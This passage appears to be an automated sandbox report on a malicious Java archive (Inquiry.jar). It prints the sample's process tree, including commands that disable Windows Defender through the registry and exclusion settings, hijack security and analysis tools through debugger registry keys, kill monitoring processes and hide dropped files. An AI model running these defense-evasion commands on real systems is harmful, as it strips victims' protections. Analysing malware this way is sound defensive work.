PID 1100 wrote to memory of 1844	1100	cmd.exe	192
PID 1100 wrote to memory of 1864	1100	cmd.exe	193
PID 1100 wrote to memory of 1864	1100	cmd.exe	193
PID 1100 wrote to memory of 1864	1100	cmd.exe	193
PID 992 wrote to memory of 1776	992	java.exe	194
PID 992 wrote to memory of 1776	992	java.exe	194
PID 992 wrote to memory of 1776	992	java.exe	194
PID 1776 wrote to memory of 1036	1776	cmd.exe	195
PID 1776 wrote to memory of 1036	1776	cmd.exe	195
PID 1776 wrote to memory of 1036	1776	cmd.exe	195
PID 1776 wrote to memory of 1752	1776	cmd.exe	196
PID 1776 wrote to memory of 1752	1776	cmd.exe	196
PID 1776 wrote to memory of 1752	1776	cmd.exe	196
PID 992 wrote to memory of 616	992	java.exe	197
PID 992 wrote to memory of 616	992	java.exe	197
PID 992 wrote to memory of 616	992	java.exe	197
PID 616 wrote to memory of 1644	616	cmd.exe	198
PID 616 wrote to memory of 1644	616	cmd.exe	198
PID 616 wrote to memory of 1644	616	cmd.exe	198
PID 616 wrote to memory of 1900	616	cmd.exe	199
PID 616 wrote to memory of 1900	616	cmd.exe	199
PID 616 wrote to memory of 1900	616	cmd.exe	199
PID 992 wrote to memory of 1536	992	java.exe	200
PID 992 wrote to memory of 1536	992	java.exe	200
PID 992 wrote to memory of 1536	992	java.exe	200
PID 1536 wrote to memory of 740	1536	cmd.exe	201
PID 1536 wrote to memory of 740	1536	cmd.exe	201
PID 1536 wrote to memory of 740	1536	cmd.exe	201
PID 1536 wrote to memory of 2024	1536	cmd.exe	202
PID 1536 wrote to memory of 2024	1536	cmd.exe	202
PID 1536 wrote to memory of 2024	1536	cmd.exe	202
PID 992 wrote to memory of 1992	992	java.exe	203
PID 992 wrote to memory of 1992	992	java.exe	203
PID 992 wrote to memory of 1992	992	java.exe	203
PID 1992 wrote to memory of 1456	1992	cmd.exe	204
PID 1992 wrote to memory of 1456	1992	cmd.exe	204
PID 1992 wrote to memory of 1456	1992	cmd.exe	204
PID 1992 wrote to memory of 2044	1992	cmd.exe	205
PID 1992 wrote to memory of 2044	1992	cmd.exe	205
PID 1992 wrote to memory of 2044	1992	cmd.exe	205
PID 992 wrote to memory of 1492	992	java.exe	206
PID 992 wrote to memory of 1492	992	java.exe	206
PID 992 wrote to memory of 1492	992	java.exe	206
PID 1492 wrote to memory of 280	1492	cmd.exe	207
PID 1492 wrote to memory of 280	1492	cmd.exe	207
PID 1492 wrote to memory of 280	1492	cmd.exe	207
PID 1492 wrote to memory of 1408	1492	cmd.exe	208
PID 1492 wrote to memory of 1408	1492	cmd.exe	208
PID 1492 wrote to memory of 1408	1492	cmd.exe	208
PID 992 wrote to memory of 1932	992	java.exe	209
PID 992 wrote to memory of 1932	992	java.exe	209
PID 992 wrote to memory of 1932	992	java.exe	209
PID 992 wrote to memory of 1592	992	java.exe	211
PID 992 wrote to memory of 1592	992	java.exe	211
PID 992 wrote to memory of 1592	992	java.exe	211
PID 1592 wrote to memory of 1872	1592	cmd.exe	212
PID 1592 wrote to memory of 1872	1592	cmd.exe	212
PID 1592 wrote to memory of 1872	1592	cmd.exe	212
PID 1592 wrote to memory of 1112	1592	cmd.exe	213
PID 1592 wrote to memory of 1112	1592	cmd.exe	213
PID 1592 wrote to memory of 1112	1592	cmd.exe	213
PID 992 wrote to memory of 1812	992	java.exe	214
PID 992 wrote to memory of 1812	992	java.exe	214
PID 992 wrote to memory of 1812	992	java.exe	214
PID 1812 wrote to memory of 1976	1812	cmd.exe	215
PID 1812 wrote to memory of 1976	1812	cmd.exe	215
PID 1812 wrote to memory of 1976	1812	cmd.exe	215
PID 1812 wrote to memory of 1920	1812	cmd.exe	216
PID 1812 wrote to memory of 1920	1812	cmd.exe	216
PID 1812 wrote to memory of 1920	1812	cmd.exe	216
PID 992 wrote to memory of 1316	992	java.exe	217
PID 992 wrote to memory of 1316	992	java.exe	217
PID 992 wrote to memory of 1316	992	java.exe	217
PID 1316 wrote to memory of 1864	1316	cmd.exe	218
PID 1316 wrote to memory of 1864	1316	cmd.exe	218
PID 1316 wrote to memory of 1864	1316	cmd.exe	218
PID 1316 wrote to memory of 1856	1316	cmd.exe	219
PID 1316 wrote to memory of 1856	1316	cmd.exe	219
PID 1316 wrote to memory of 1856	1316	cmd.exe	219
PID 992 wrote to memory of 1384	992	java.exe	220
PID 992 wrote to memory of 1384	992	java.exe	220
PID 992 wrote to memory of 1384	992	java.exe	220
PID 1384 wrote to memory of 1752	1384	cmd.exe	221
PID 1384 wrote to memory of 1752	1384	cmd.exe	221
PID 1384 wrote to memory of 1752	1384	cmd.exe	221
PID 1384 wrote to memory of 1116	1384	cmd.exe	222
PID 1384 wrote to memory of 1116	1384	cmd.exe	222
PID 1384 wrote to memory of 1116	1384	cmd.exe	222
PID 992 wrote to memory of 1772	992	java.exe	223
PID 992 wrote to memory of 1772	992	java.exe	223
PID 992 wrote to memory of 1772	992	java.exe	223
PID 1772 wrote to memory of 2008	1772	cmd.exe	224
PID 1772 wrote to memory of 2008	1772	cmd.exe	224
PID 1772 wrote to memory of 2008	1772	cmd.exe	224
PID 1772 wrote to memory of 1656	1772	cmd.exe	225
PID 1772 wrote to memory of 1656	1772	cmd.exe	225
PID 1772 wrote to memory of 1656	1772	cmd.exe	225
PID 992 wrote to memory of 1988	992	java.exe	226
PID 992 wrote to memory of 1988	992	java.exe	226
PID 992 wrote to memory of 1988	992	java.exe	226
PID 1988 wrote to memory of 2036	1988	cmd.exe	227
PID 1988 wrote to memory of 2036	1988	cmd.exe	227
PID 1988 wrote to memory of 2036	1988	cmd.exe	227
PID 1988 wrote to memory of 1644	1988	cmd.exe	228
PID 1988 wrote to memory of 1644	1988	cmd.exe	228
PID 1988 wrote to memory of 1644	1988	cmd.exe	228
PID 992 wrote to memory of 788	992	java.exe	229
PID 992 wrote to memory of 788	992	java.exe	229
PID 992 wrote to memory of 788	992	java.exe	229
PID 788 wrote to memory of 316	788	cmd.exe	230
PID 788 wrote to memory of 316	788	cmd.exe	230
PID 788 wrote to memory of 316	788	cmd.exe	230
PID 788 wrote to memory of 2024	788	cmd.exe	231
PID 788 wrote to memory of 2024	788	cmd.exe	231
PID 788 wrote to memory of 2024	788	cmd.exe	231
PID 992 wrote to memory of 1516	992	java.exe	232
PID 992 wrote to memory of 1516	992	java.exe	232
PID 992 wrote to memory of 1516	992	java.exe	232
PID 1516 wrote to memory of 1996	1516	cmd.exe	233
PID 1516 wrote to memory of 1996	1516	cmd.exe	233
PID 1516 wrote to memory of 1996	1516	cmd.exe	233
PID 1516 wrote to memory of 1924	1516	cmd.exe	234
PID 1516 wrote to memory of 1924	1516	cmd.exe	234
PID 1516 wrote to memory of 1924	1516	cmd.exe	234
PID 992 wrote to memory of 280	992	java.exe	235
PID 992 wrote to memory of 280	992	java.exe	235
PID 992 wrote to memory of 280	992	java.exe	235
PID 280 wrote to memory of 1408	280	cmd.exe	236
PID 280 wrote to memory of 1408	280	cmd.exe	236
PID 280 wrote to memory of 1408	280	cmd.exe	236
PID 280 wrote to memory of 1508	280	cmd.exe	237
PID 280 wrote to memory of 1508	280	cmd.exe	237
PID 280 wrote to memory of 1508	280	cmd.exe	237
PID 992 wrote to memory of 1440	992	java.exe	238
PID 992 wrote to memory of 1440	992	java.exe	238
PID 992 wrote to memory of 1440	992	java.exe	238
PID 1440 wrote to memory of 1652	1440	cmd.exe	239
PID 1440 wrote to memory of 1652	1440	cmd.exe	239
PID 1440 wrote to memory of 1652	1440	cmd.exe	239
PID 1440 wrote to memory of 1564	1440	cmd.exe	240
PID 1440 wrote to memory of 1564	1440	cmd.exe	240
PID 1440 wrote to memory of 1564	1440	cmd.exe	240
PID 992 wrote to memory of 2012	992	java.exe	241
PID 992 wrote to memory of 2012	992	java.exe	241
PID 992 wrote to memory of 2012	992	java.exe	241
PID 2012 wrote to memory of 1112	2012	cmd.exe	242
PID 2012 wrote to memory of 1112	2012	cmd.exe	242
PID 2012 wrote to memory of 1112	2012	cmd.exe	242
PID 2012 wrote to memory of 2016	2012	cmd.exe	243
PID 2012 wrote to memory of 2016	2012	cmd.exe	243
PID 2012 wrote to memory of 2016	2012	cmd.exe	243
PID 992 wrote to memory of 1880	992	java.exe	244
PID 992 wrote to memory of 1880	992	java.exe	244
PID 992 wrote to memory of 1880	992	java.exe	244
PID 1880 wrote to memory of 1488	1880	cmd.exe	245
PID 1880 wrote to memory of 1488	1880	cmd.exe	245
PID 1880 wrote to memory of 1488	1880	cmd.exe	245
PID 992 wrote to memory of 1864	992	java.exe	246
PID 992 wrote to memory of 1864	992	java.exe	246
PID 992 wrote to memory of 1864	992	java.exe	246
PID 1880 wrote to memory of 1848	1880	cmd.exe	248
PID 1880 wrote to memory of 1848	1880	cmd.exe	248
PID 1880 wrote to memory of 1848	1880	cmd.exe	248
PID 992 wrote to memory of 1684	992	java.exe	249
PID 992 wrote to memory of 1684	992	java.exe	249
PID 992 wrote to memory of 1684	992	java.exe	249
PID 1684 wrote to memory of 2008	1684	cmd.exe	250
PID 1684 wrote to memory of 2008	1684	cmd.exe	250
PID 1684 wrote to memory of 2008	1684	cmd.exe	250
PID 1684 wrote to memory of 2036	1684	cmd.exe	251
PID 1684 wrote to memory of 2036	1684	cmd.exe	251
PID 1684 wrote to memory of 2036	1684	cmd.exe	251
PID 992 wrote to memory of 1568	992	java.exe	252
PID 992 wrote to memory of 1568	992	java.exe	252
PID 992 wrote to memory of 1568	992	java.exe	252
PID 1568 wrote to memory of 520	1568	cmd.exe	253
PID 1568 wrote to memory of 520	1568	cmd.exe	253
PID 1568 wrote to memory of 520	1568	cmd.exe	253
PID 1568 wrote to memory of 2024	1568	cmd.exe	254
PID 1568 wrote to memory of 2024	1568	cmd.exe	254
PID 1568 wrote to memory of 2024	1568	cmd.exe	254
PID 992 wrote to memory of 2044	992	java.exe	255
PID 992 wrote to memory of 2044	992	java.exe	255
PID 992 wrote to memory of 2044	992	java.exe	255
PID 2044 wrote to memory of 868	2044	cmd.exe	256
PID 2044 wrote to memory of 868	2044	cmd.exe	256
PID 2044 wrote to memory of 868	2044	cmd.exe	256
PID 2044 wrote to memory of 584	2044	cmd.exe	257
PID 2044 wrote to memory of 584	2044	cmd.exe	257
PID 2044 wrote to memory of 584	2044	cmd.exe	257
PID 992 wrote to memory of 1408	992	java.exe	258
PID 992 wrote to memory of 1408	992	java.exe	258
PID 992 wrote to memory of 1408	992	java.exe	258
PID 1408 wrote to memory of 1496	1408	cmd.exe	259
PID 1408 wrote to memory of 1496	1408	cmd.exe	259
PID 1408 wrote to memory of 1496	1408	cmd.exe	259
PID 1408 wrote to memory of 1828	1408	cmd.exe	260
PID 1408 wrote to memory of 1828	1408	cmd.exe	260
PID 1408 wrote to memory of 1828	1408	cmd.exe	260
PID 992 wrote to memory of 1564	992	java.exe	261
PID 992 wrote to memory of 1564	992	java.exe	261
PID 992 wrote to memory of 1564	992	java.exe	261
PID 1564 wrote to memory of 1432	1564	cmd.exe	262
PID 1564 wrote to memory of 1432	1564	cmd.exe	262
PID 1564 wrote to memory of 1432	1564	cmd.exe	262
PID 1564 wrote to memory of 1944	1564	cmd.exe	263
PID 1564 wrote to memory of 1944	1564	cmd.exe	263
PID 1564 wrote to memory of 1944	1564	cmd.exe	263
PID 992 wrote to memory of 1856	992	java.exe	264
PID 992 wrote to memory of 1856	992	java.exe	264
PID 992 wrote to memory of 1856	992	java.exe	264
PID 1856 wrote to memory of 1504	1856	cmd.exe	265
PID 1856 wrote to memory of 1504	1856	cmd.exe	265
PID 1856 wrote to memory of 1504	1856	cmd.exe	265
PID 1856 wrote to memory of 1580	1856	cmd.exe	266
PID 1856 wrote to memory of 1580	1856	cmd.exe	266
PID 1856 wrote to memory of 1580	1856	cmd.exe	266
PID 992 wrote to memory of 1656	992	java.exe	267
PID 992 wrote to memory of 1656	992	java.exe	267
PID 992 wrote to memory of 1656	992	java.exe	267
PID 1656 wrote to memory of 1900	1656	cmd.exe	268
PID 1656 wrote to memory of 1900	1656	cmd.exe	268
PID 1656 wrote to memory of 1900	1656	cmd.exe	268
PID 1656 wrote to memory of 1784	1656	cmd.exe	269
PID 1656 wrote to memory of 1784	1656	cmd.exe	269
PID 1656 wrote to memory of 1784	1656	cmd.exe	269
PID 992 wrote to memory of 1864	992	java.exe	270
PID 992 wrote to memory of 1864	992	java.exe	270
PID 992 wrote to memory of 1864	992	java.exe	270
PID 1864 wrote to memory of 1644	1864	cmd.exe	271
PID 1864 wrote to memory of 1644	1864	cmd.exe	271
PID 1864 wrote to memory of 1644	1864	cmd.exe	271
PID 1864 wrote to memory of 2036	1864	cmd.exe	272
PID 1864 wrote to memory of 2036	1864	cmd.exe	272
PID 1864 wrote to memory of 2036	1864	cmd.exe	272
PID 992 wrote to memory of 316	992	java.exe	273
PID 992 wrote to memory of 316	992	java.exe	273
PID 992 wrote to memory of 316	992	java.exe	273
PID 316 wrote to memory of 1456	316	cmd.exe	274
PID 316 wrote to memory of 1456	316	cmd.exe	274
PID 316 wrote to memory of 1456	316	cmd.exe	274
PID 316 wrote to memory of 576	316	cmd.exe	275
PID 316 wrote to memory of 576	316	cmd.exe	275
PID 316 wrote to memory of 576	316	cmd.exe	275
PID 992 wrote to memory of 868	992	java.exe	276
PID 992 wrote to memory of 868	992	java.exe	276
PID 992 wrote to memory of 868	992	java.exe	276
PID 868 wrote to memory of 1508	868	cmd.exe	277
PID 868 wrote to memory of 1508	868	cmd.exe	277
PID 868 wrote to memory of 1508	868	cmd.exe	277
PID 868 wrote to memory of 1932	868	cmd.exe	278
PID 868 wrote to memory of 1932	868	cmd.exe	278
PID 868 wrote to memory of 1932	868	cmd.exe	278
PID 992 wrote to memory of 1828	992	java.exe	279
PID 992 wrote to memory of 1828	992	java.exe	279
PID 992 wrote to memory of 1828	992	java.exe	279
PID 1828 wrote to memory of 1976	1828	cmd.exe	280
PID 1828 wrote to memory of 1976	1828	cmd.exe	280
PID 1828 wrote to memory of 1976	1828	cmd.exe	280
PID 1828 wrote to memory of 2016	1828	cmd.exe	281
PID 1828 wrote to memory of 2016	1828	cmd.exe	281
PID 1828 wrote to memory of 2016	1828	cmd.exe	281
PID 992 wrote to memory of 1488	992	java.exe	282
PID 992 wrote to memory of 1488	992	java.exe	282
PID 992 wrote to memory of 1488	992	java.exe	282
PID 1488 wrote to memory of 1504	1488	cmd.exe	283
PID 1488 wrote to memory of 1504	1488	cmd.exe	283
PID 1488 wrote to memory of 1504	1488	cmd.exe	283
PID 1488 wrote to memory of 2028	1488	cmd.exe	284
PID 1488 wrote to memory of 2028	1488	cmd.exe	284
PID 1488 wrote to memory of 2028	1488	cmd.exe	284
PID 992 wrote to memory of 1588	992	java.exe	285
PID 992 wrote to memory of 1588	992	java.exe	285
PID 992 wrote to memory of 1588	992	java.exe	285
PID 1588 wrote to memory of 1784	1588	cmd.exe	286
PID 1588 wrote to memory of 1784	1588	cmd.exe	286
PID 1588 wrote to memory of 1784	1588	cmd.exe	286
PID 1588 wrote to memory of 2008	1588	cmd.exe	287
PID 1588 wrote to memory of 2008	1588	cmd.exe	287
PID 1588 wrote to memory of 2008	1588	cmd.exe	287
PID 992 wrote to memory of 740	992	java.exe	288
PID 992 wrote to memory of 740	992	java.exe	288
PID 992 wrote to memory of 740	992	java.exe	288
PID 740 wrote to memory of 1996	740	cmd.exe	289
PID 740 wrote to memory of 1996	740	cmd.exe	289
PID 740 wrote to memory of 1996	740	cmd.exe	289
PID 740 wrote to memory of 1456	740	cmd.exe	290
PID 740 wrote to memory of 1456	740	cmd.exe	290
PID 740 wrote to memory of 1456	740	cmd.exe	290
PID 992 wrote to memory of 584	992	java.exe	291
PID 992 wrote to memory of 584	992	java.exe	291
PID 992 wrote to memory of 584	992	java.exe	291
PID 584 wrote to memory of 1652	584	cmd.exe	292
PID 584 wrote to memory of 1652	584	cmd.exe	292
PID 584 wrote to memory of 1652	584	cmd.exe	292
PID 584 wrote to memory of 1932	584	cmd.exe	293
PID 584 wrote to memory of 1932	584	cmd.exe	293
PID 584 wrote to memory of 1932	584	cmd.exe	293
PID 992 wrote to memory of 1892	992	java.exe	294
PID 992 wrote to memory of 1892	992	java.exe	294
PID 992 wrote to memory of 1892	992	java.exe	294
PID 992 wrote to memory of 1808	992	java.exe	296
PID 992 wrote to memory of 1808	992	java.exe	296
PID 992 wrote to memory of 1808	992	java.exe	296
PID 1808 wrote to memory of 1780	1808	cmd.exe	297
PID 1808 wrote to memory of 1780	1808	cmd.exe	297
PID 1808 wrote to memory of 1780	1808	cmd.exe	297
PID 1808 wrote to memory of 1524	1808	cmd.exe	298
PID 1808 wrote to memory of 1524	1808	cmd.exe	298
PID 1808 wrote to memory of 1524	1808	cmd.exe	298
PID 992 wrote to memory of 2024	992	java.exe	299
PID 992 wrote to memory of 2024	992	java.exe	299
PID 992 wrote to memory of 2024	992	java.exe	299
PID 2024 wrote to memory of 1924	2024	cmd.exe	300
PID 2024 wrote to memory of 1924	2024	cmd.exe	300
PID 2024 wrote to memory of 1924	2024	cmd.exe	300
PID 2024 wrote to memory of 1496	2024	cmd.exe	301
PID 2024 wrote to memory of 1496	2024	cmd.exe	301
PID 2024 wrote to memory of 1496	2024	cmd.exe	301
PID 992 wrote to memory of 2016	992	java.exe	302
PID 992 wrote to memory of 2016	992	java.exe	302
PID 992 wrote to memory of 2016	992	java.exe	302
PID 2016 wrote to memory of 1112	2016	cmd.exe	303
PID 2016 wrote to memory of 1112	2016	cmd.exe	303
PID 2016 wrote to memory of 1112	2016	cmd.exe	303
PID 2016 wrote to memory of 1784	2016	cmd.exe	304
PID 2016 wrote to memory of 1784	2016	cmd.exe	304
PID 2016 wrote to memory of 1784	2016	cmd.exe	304
PID 992 wrote to memory of 1272	992	java.exe	305
PID 992 wrote to memory of 1272	992	java.exe	305
PID 992 wrote to memory of 1272	992	java.exe	305
PID 1272 wrote to memory of 1848	1272	cmd.exe	306
PID 1272 wrote to memory of 1848	1272	cmd.exe	306
PID 1272 wrote to memory of 1848	1272	cmd.exe	306
PID 1272 wrote to memory of 1520	1272	cmd.exe	307
PID 1272 wrote to memory of 1520	1272	cmd.exe	307
PID 1272 wrote to memory of 1520	1272	cmd.exe	307
PID 992 wrote to memory of 1892	992	java.exe	308
PID 992 wrote to memory of 1892	992	java.exe	308
PID 992 wrote to memory of 1892	992	java.exe	308
PID 992 wrote to memory of 1932	992	java.exe	310
PID 992 wrote to memory of 1932	992	java.exe	310
PID 992 wrote to memory of 1932	992	java.exe	310
PID 992 wrote to memory of 1520	992	java.exe	312
PID 992 wrote to memory of 1520	992	java.exe	312
PID 992 wrote to memory of 1520	992	java.exe	312
PID 992 wrote to memory of 1600	992	java.exe	314
PID 992 wrote to memory of 1600	992	java.exe	314
PID 992 wrote to memory of 1600	992	java.exe	314

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1936	attrib.exe
576	attrib.exe
432	attrib.exe
1600	attrib.exe
1652	attrib.exe
1592	attrib.exe
1564	attrib.exe
1976	attrib.exe

C:\Windows\system32\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\Inquiry.jar
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:992
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1760
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1780
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1420
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1860
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1872
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:576
- C:\Windows\system32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:432
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\DNVJe\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1600
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\DNVJe\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1652
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\DNVJe
  2⤵
  - Views/modifies file attributes
  PID:1592
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\DNVJe
  2⤵
  - Views/modifies file attributes
  PID:1564
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\DNVJe
  2⤵
  - Views/modifies file attributes
  PID:1976
- C:\Windows\system32\attrib.exe
  attrib +h +s +r C:\Users\Admin\DNVJe\AWHZt.class
  2⤵
  - Views/modifies file attributes
  PID:1936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\DNVJe','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\DNVJe\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2028
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1196
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:1544
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:1160
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1492
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1432
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:616
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1496
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:1584
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1036
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:1776
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1852
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1828
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:664
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:520
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1568
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1456
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:1640
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1884
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1268
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2016
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1416
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1864
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1616
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1588
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:1924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:1988
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1816
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:740
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:1436
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1968
- C:\Windows\system32\cmd.exe
  cmd.exe
